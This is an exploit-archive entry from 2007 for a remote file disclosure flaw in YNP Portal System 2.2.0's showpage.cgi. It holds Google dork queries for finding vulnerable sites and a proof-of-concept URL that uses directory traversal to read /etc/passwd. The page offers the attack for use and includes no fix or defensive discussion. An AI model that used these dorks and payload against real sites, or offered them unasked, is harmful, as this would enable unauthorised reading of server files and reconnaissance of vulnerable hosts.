YNP Portal System 2.2.0 (showpage.cgi p) Remote File Disclosure

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : YNP Portal System 2.2.0 (showpage.cgi p) Remote File Disclosure
# Published : 2007-08-06
# Author : GoLd_M
# Previous Title : la-nai cms 1.2.14 Multiple Remote SQL Injection Vulnerabilities
# Next Title : CartWeaver (Details.cfm ProdID) Remote SQL Injection Vulnerability

#################################################################################
# YNP Portal System 2.2.0 (showpage.cgi p) Remote File Disclosure Vulnerability #
# D0RK : inurl:"showpage.cgi?p=popsearch.html"                               #
#      : inurl:"showpage.cgi?p=support.html"                                 #
#      : inurl:"showpage.cgi?p=dialup.html"                                  #
#      : inurl:"showpage.cgi?p="                                             #
# POC: http://xxxx.com/showpage.cgi?p=../../../../../../etc/passwd           #
# Discovered by: GolD_M = [Mahmood_ali]                                      #
# Thanx To : Tryag-Team & Asbmay's Group & bd0rk & Cold Zero & All My Friends   #
#################################################################################

# www.Syue.com [2007-08-06]